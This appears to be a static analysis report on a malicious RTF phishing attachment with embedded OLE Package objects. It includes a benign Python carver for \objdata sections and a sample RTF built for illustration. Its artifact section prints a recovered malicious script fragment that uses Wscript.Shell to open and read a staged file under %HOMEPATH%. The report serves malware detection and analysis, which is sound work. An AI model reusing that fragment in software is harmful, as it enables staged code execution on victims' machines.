Malicious RTF — malware analysis report

Static analysis result for SHA-256 9daba4e7a7f9385d…

Verdict: MALICIOUS
Type: RTF
Size: 3.25 MB
Created: 2017-12-10 23:21:00
First seen: 2019-05-16
MD5: fa1c548a5d691ac9ce7bfd929f204261
SHA-1: b8f52caa9e2ac66441b901bec557462318914e61
SHA-256: 9daba4e7a7f9385d0f16f87cc95d67c9581240ca9f3b0a65bd8b3ce907eee826
Risk score: 220

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The RTF file contains two embedded OLE objects (\objemb) and roughly 1710 KB of hex-encoded data inside its \objdata sections (about 855 KB once decoded), a common way of hiding a payload inside a document. One object carries the OLE Package class, which can wrap an arbitrary file. ClamAV identified the file as Win.Phishing.Suspicious-6355521-4, consistent with a phishing attachment. The carved artifact objdata_00_off00015c36.bin is likely the payload: ClamAV does not flag it, but static analysis recovered a script fragment that obtains a Wscript.Shell object, expands %HOMEPATH%, opens mdo5.txt there, skips its first four lines and reads on from that point, together with seven shell/COM execution tokens. Only one of the two \objdata sections appears among the extracted artifacts.

Heuristics (6)

  • [critical] CLAMAV_DETECTION: ClamAV: Win.Phishing.Suspicious-6355521-4
    ClamAV detected this file as malware: Win.Phishing.Suspicious-6355521-4
  • [high] RTF_OBJCLASS_PACKAGE: Package object class
    OLE Package object, which can wrap arbitrary files
  • [high] RTF_EXCESSIVE_HEX: Large hex data blocks in OLE object
    RTF contains ~1710 KB of hex-encoded data inside \objdata sections, which may hide a payload
  • [high] EXTRACTED_FILE_STATIC_TRIAGE: Suspicious extracted artifact
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • [medium] RTF_OBJDATA: OLE object data
    RTF contains 2 \objdata section(s), i.e. embedded OLE objects
  • [medium] RTF_OBJEMB: Embedded OLE object
    RTF contains \objemb, an embedded OLE object
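The RTF heuristics above (RTF_OBJDATA, RTF_OBJEMB, RTF_OBJCLASS_PACKAGE, RTF_EXCESSIVE_HEX) come down to one operation: locate each \objdata group, decode its hex payload, and look at the enclosing \object group for \objemb and \objclass. The carver below is an added example written for this page, not the analysis platform's own code. The RTF it runs on is constructed for illustration (a 20-byte OLE 1.0 Package header plus a four-byte filler object), the artifact naming mirrors the report's objdata_NN_offXXXXXXXX.bin scheme, and the 256 KB hex_limit threshold is an assumption, not the platform's real cut-off.

```python
"""Minimal RTF \\objdata carver (added example, not the report platform's code).

Finds every \\objdata group in an RTF byte string, decodes the hex payload and
records whether the enclosing \\object group is \\objemb and which \\objclass it
declares, then maps those facts onto the report's heuristic IDs.
"""
import re

# Constructed sample RTF: one embedded OLE Package object (the case the report
# flags) and one auto-linked object. Payload bytes are filler, not real malware.
SAMPLE_RTF = (
    b"{\\rtf1\\ansi\\deff0 Invoice attached.\\par\r\n"
    b"{\\object\\objemb\\objw1440\\objh1440"
    b"{\\*\\objclass Package}"
    b"{\\*\\objdata 01050000 0200 0000\r\n0800 0000 5061636b 61676500}"
    b"}"
    b"{\\object\\objautlink{\\*\\objdata deadbeef}}"
    b"}"
)

OBJDATA_RE = re.compile(rb"\\objdata\b")
OBJCLASS_RE = re.compile(rb"\\objclass\s+([A-Za-z0-9._]+)")
HEX_CHARS = frozenset(b"0123456789abcdefABCDEF")


def _read_hex_group(data, pos):
    """Collect hex digits from pos until the '}' that closes the \\objdata group.
    Whitespace is ignored; nested groups (stray control words inside the
    payload) are skipped rather than decoded."""
    depth = 0
    hexbuf = bytearray()
    while pos < len(data):
        c = data[pos]
        if c == ord("{"):
            depth += 1
        elif c == ord("}"):
            if depth == 0:
                break
            depth -= 1
        elif depth == 0 and c in HEX_CHARS:
            hexbuf.append(c)
        pos += 1
    if len(hexbuf) % 2:  # odd nibble count: drop the dangling digit
        hexbuf.pop()
    return bytes.fromhex(hexbuf.decode("ascii"))


def carve_objdata(data):
    """Return one record per \\objdata section: carved bytes plus context flags."""
    records = []
    for idx, m in enumerate(OBJDATA_RE.finditer(data)):
        payload = _read_hex_group(data, m.end())
        # The enclosing \object group starts at the last '\object' before \objdata.
        obj_start = data.rfind(b"\\object", 0, m.start())
        header = data[obj_start:m.start()] if obj_start != -1 else b""
        cls = OBJCLASS_RE.search(header)
        records.append({
            "name": "objdata_%02d_off%08x.bin" % (idx, m.start()),
            "offset": m.start(),
            "size": len(payload),
            "data": payload,
            "objemb": b"\\objemb" in header,
            "objclass": cls.group(1).decode() if cls else None,
        })
    return records


def triage(data, hex_limit=256 * 1024):
    """Apply the report's RTF heuristics; hex_limit (decoded bytes) is an
    assumed threshold, not the platform's real one."""
    recs = carve_objdata(data)
    hits = []
    if recs:
        hits.append("RTF_OBJDATA")
    if any(r["objemb"] for r in recs):
        hits.append("RTF_OBJEMB")
    if any(r["objclass"] == "Package" for r in recs):
        hits.append("RTF_OBJCLASS_PACKAGE")
    if sum(r["size"] for r in recs) > hex_limit:
        hits.append("RTF_EXCESSIVE_HEX")
    return hits, recs


if __name__ == "__main__":
    hits, recs = triage(SAMPLE_RTF)
    for r in recs:
        print("%s  %d bytes  objemb=%s  class=%s"
              % (r["name"], r["size"], r["objemb"], r["objclass"]))
    print("heuristics:", hits)
```

This handles the hex form of \objdata only. A payload introduced with \bin followed by raw bytes, or an \objdata control word broken up by RTF obfuscation tricks, will not be carved by this scanner, which is one reason the decoded size in a carver can differ from a naive count of hex characters in the file.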

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: objdata_00_off00015c36.bin
Kind: rtf-objdata-decoded
Source: RTF \objdata at offset 0x15C36
Size: 810571 bytes
SHA-256: 95aeef35ed31964796c7262ff3c0529b998013e89cc0e5fe37e092f3f7a36ead
Detection:
  • ClamAV: No threats found
  • Obfuscation or payload: likely
  • Static shellcode analysis recovered command string(s): Wscript.Shell');p=esha.ExpandEnvironmentStrings('%%HOM'+'EPATH%%')+'\\mdo5.txt';var f=ofs.OpenTextFile(p,1,false);for(i=0;i^<4;i++)f.SkipLine();var com='';while(!f.AtE
  • Carved artifact contains 7 shell/COM execution token(s).